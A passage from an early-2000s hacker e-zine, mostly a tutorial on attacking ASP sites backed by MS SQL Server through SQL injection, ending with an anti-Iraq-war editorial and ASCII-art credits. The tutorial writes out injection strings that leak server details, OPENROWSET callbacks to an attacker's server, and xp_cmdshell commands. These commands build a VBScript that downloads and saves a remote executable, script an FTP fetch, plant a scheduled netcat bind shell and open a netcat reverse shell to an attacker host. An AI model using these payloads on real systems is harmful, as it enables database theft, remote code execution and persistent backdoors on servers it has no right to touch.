SELECT age FROM boys UNION SELECT age FROM girls;
Note that in this example both age in boys and age in girls are of the
type 'integer'. But what would happen if we were to attempt to merge a
string to an integer? Lets see. In userlist we have 3 columns, the
first being an integer, the following two being strings. Lets pair
up the first integer in userlist (UID) with a string using the UNION
statement and see how it errors out:
SELECT * FROM userlist WHERE Username = '' UNION 'wo0t', 'x', 'x'
Here we've paired the integer 10 in userlist's column UID with the
string 'wo0t'. This will produce the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error
converting the char value 'wo0t' to a column of data type int.
/auth.asp, line 28
boohaw. SQL has reported the actual contents of the string we passed
it ('wo0t'). This is a good way to pull a bit more info from the SQL
server. For instance, SQL server comes equipped with a built in
constant called @@version. Stored within @@version is some detailed
information about the version, build, release of the sql server
running and the platform it is running on.
Lets submit the same type of query, but this time we'll pair the
integer column UID with the string constant @@version:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error
converting the char value 'Microsoft SQL Server 2000 - 8.00.194
(Intel X86) Aug 6 2000 00:57:48 Copyright 1988-2000 Microsoft
Corporation Enterprise Edition on Windows 2000 2.0 (Build 6132:
Service Pack 3) ' to a column of data type int.
/auth.asp, line 28
- nods* interesting. Unlike most compile and run or copy and paste
exploits, SQL Injection requires a little bit of cleverness,
so for anyone interested, there's a list of @@ constants at:
http://www.ddart.net/mssql/sql2000/html/ maybe you'll find something
to do with them that I havn't :)
Now, in an attempt to thwart these types of attacks, a savvy sysadmin
can configure his sql server to not display these errors to the user.
On top of that, there are plenty of other ways an administrator can
stop potential attackers by making it difficult for them to see the
results of their queries. All of a sudden things look a little bleak.
Never fear, theres more :)
If you can't see error messages, and theres nothing in the .asp that
you can force to display your queries results in the browser, how can
you do anything? Its like hacking blind. Well, Theres an SQL statement
suited to this problem. OPENROWSET is a component of SQL that has the
ability to grab data from/pass data too remote databases. Using
OPENROWSET its possible to do plenty of fun things. For instance lets
say the attacker has SQL Server running on his system. He queries the
sql server he's attacking and recieves no error msg... So how does he
know its even vulnerable? he can use OPENROWSET in his query to have
the victim sql server attempt to pull data from HIS sql server. He'd
notice the inbound connection on his system and, therefore know that
hes executing queries on the target server :)
He would do that with the following injection:
SELECT * FROM userlist WHERE Username = ''; SELECT * FROM
OPENROWSET('SQLoledb', uid=username; pwd=password
network=DBMSSOCN;address=0.0.0.0,31337;', 'SELECT
* FROM userlist')
As you know, the first query is created by auth.asp and not important
to us in anyway. we've successfully injected the second query,
beginning with the second SELECT statement. This will connect to
a remote SQL server running on port 31337 of 0.0.0.0 (of course the
attacker would change these to the ip,port that his sql server was
running on. The attacker would then watch with his firewall or packet
logging software or what have you for the inbound connection.
Now it is, of course, possible that the system the target servers
running on is behind a firewall. If the firewall wont allow outbound
connections to port 31337 then the above attack wouldn't work. This
is not necessarily a bad thing though... We can use this behaviour
to determine the firewalls rulesets :) Try various ports and determine
which ones we can initiate outbound connections through. This is
particularly useful when we come to realize that the SQL language
comes equipped with the ability to upload and execute files on the
server.
This can be accomplished using the xp_cmdshell procedure. xp_cmdshell
is basically an SQL command that will spawn a command shell and pass
arguments to it. Anyone thats used DOS extensively can probably think
of plenty of fun things to do with this procedure. For instance, lets
use the dos command ECHO and the append operator (>>) to construct a
.vbs file on the servers filesystem:
SELECT * FROM userlist where USERNAME = '';
exec master..xp_cmdshell 'echo
code for our .vbs program >>
0wn3d.vbs'
As you can see, the syntax for xp_cmdshell is exec master..xp_cmdshell
'command'. There are plenty of interesting things we could stuff that
.vbs with... possibly some code to fetch files off the web?
Set xmlHTTP = CreateObject("MSXML2.ServerXMLHTTP")
URL= "http://www.domain.com/file.exe"
xmlHTTP.open "GET", URL, false
xmlHTTP.send()
set myStream = CreateObject("ADODB.Stream")
myStream.Open
myStream.Type = 1
myStream.Write xmlHTTP.ResponseBody
myStream.Position = 0 'Set the stream position to the start
myXMLfile = "D:\file.zip"
set FSO = Createobject("Scripting.FileSystemObject")
if fso.Fileexists(myXMLfile) then Fso.DeleteFile myXMLfile
set FSO = Nothing
myStream.SaveToFile myXMLfile
myStream.Close
Set myStream = Nothing
Or for those who don't know vbscript, you could use the same method
to stuff a file with FTP commands and run ftp with the input piped in
from that file. You would fill up a file with ftp commands like this:
exec master..xp_cmdshell 'echo open 0.0.0.0 21 >> ftp.dat'
exec master..xp_cmdshell 'echo username >> ftp.dat'
exec master..xp_cmdshell 'echo password >> ftp.dat'
exec master..xp_cmdshell 'echo lcd c:\ >> ftp.dat'
exec master..xp_cmdshell 'echo binary >> ftp.dat'
exec master..xp_cmdshell 'echo get path\file.exe >> ftp.dat'
Then finally, you would use the command:
exec master..xp_cmdshell 'ftp.exe < ftp.dat'
Which would run ftp using all the commands in ftp.dat as its input.
We could use this technique to upload netcat to the target server and
have it hardlisten to some port acting as a backdoor. we could also
execute the AT command from the command line adding our backdoor to
the win2k scheduling program (assuming win2k is the platform running
and the scheduling service is running.
exec master..xp_cmdshell 'nc -L -d -e cmd.exe -p 31337'
exec master..xp_cmdshell 'AT 00:00 /every:M "nc -L -d -e cmd.exe -p
31337"'
Of course, instead of 31337, you would use a port that you know you
can connect to. Wait, what if the firewall is too picky for that?
well, we can get around this also. Often a firewall will do a damn
good job keeping packets from getting in... but they don't often make
to big a deal of letting packets out. We can initiate a connection
from inside the firewall like this:
exec master..xp_cmdshell 'nc -d -e cmd.exe 0.0.0.0 31337'
Replacing 0.0.0.0 with the attackers system, or a system he is in
control of and having that system listen on port 31337 (or any port
that the firewall will packets flow out through, remember when we used
openrowset to mine those types of rules from the firewall? hurrah.
You can also use the timeout property of openrowset to turn your
target into a portscanner. the possibilities are endless. :)
Well, I'm sure theres a few things I'm missing... but I'm on a bit of
a tight schedual this week... Kleptics waiting on me. If anyone has
any questions feel free to ask me at dropc0de@yahoo.com.
----------------------------------------------------------------------
greets: savvyD, ramb0x, gr3p, kleptic, dirv, jenny, lexi, lenny,
turb, joja, smiley, again. And this time i'd like to add Kybo,
Count and Forge. :D
_______________________________________________________________
|______________________________________________________________ |
|| ||
|| ___ _ ____ _ ||
|| / _ \ _ _| |_| __ ) _ __ ___ __ _| | _ ||
|| | | | | | | | __| _ \| '__/ _ \/ _` | |/ / ||
|| | |_| | |_| | |_| |_) | | | __/ (_| | < ||
|| \___/ \__,_|\__|____/|_| \___|\__,_|_|\_\ ||
|| ||
||_____--------------------------------------------------______||
|_______/-----------------------------------------------\_______|
___ _ _
| __(_)_ _ __ _| |
| _|| | ' \/ _` | |
__ |_| |_|_||_\__,_|_|
\ \ / /__ _ _ __| |___
\ \/\/ / _ \ '_/ _` (_-<
\_/\_/\___/_| \__,_/__/
����������������������������������������������������������������
PUT THE WORDS IN HERE:
Hey everyone! Well, here is issue #10. Hope you all enjoyed it.
I usually write about howe you should send us articles. But this
Issue I want you to read something written by, Matthew Rothschild.
================
Bush's Obscenity
================
On October 3, Bush uttered one of the grossest obscenities imaginable:
"War may be unavoidable."
War is almost always avoidable.
In the case of Iraq, it is particularly avoidable, since Iraq has not
attacked the United States and is in no position to do so.
It's only "unavoidable" because Bush so desperately wants to go to war.
Bush, not Saddam Hussein, is blocking the U.N. inspectors from going
back to work.
And Bush and Blair are insisting that U.N. Security Council let the
war begin.
How Bush could then say, with a straight face, that "we didn't ask for
this challenge" is beyond me.
Then, pouring it on, he added, "None of us here today desire to see
military conflict because we know the awful nature of war."
Actually, I doubt Bush has any appreciation of the awful nature of war,
and his desire for military conflict against Iraq is on display for all
to see.
These rhetorical feints are mere calisthenics before the heavy lifting
of the bombs, a ritual clearing of the throat before the war whoop.
- Outbreak Staff
����������������������������������������������������������������
++++++++++++++++++++++++++WATCH THIS SPACE++++++++++++++++++++++
����������������������������������������������������������������ij
+-+-+-+-+-+-+-+-+
-���������������������۲������-|O|u|t|b|r|e|a|k|𰰰������������������۲�����-
+-+-+-+-+-+-+-+-+
����������������������������������������������������������������ij
Outbreak Contents may not be used with out express written permission
By the Editor - kleptic@grex.org
COPYRIGHT�� 2002.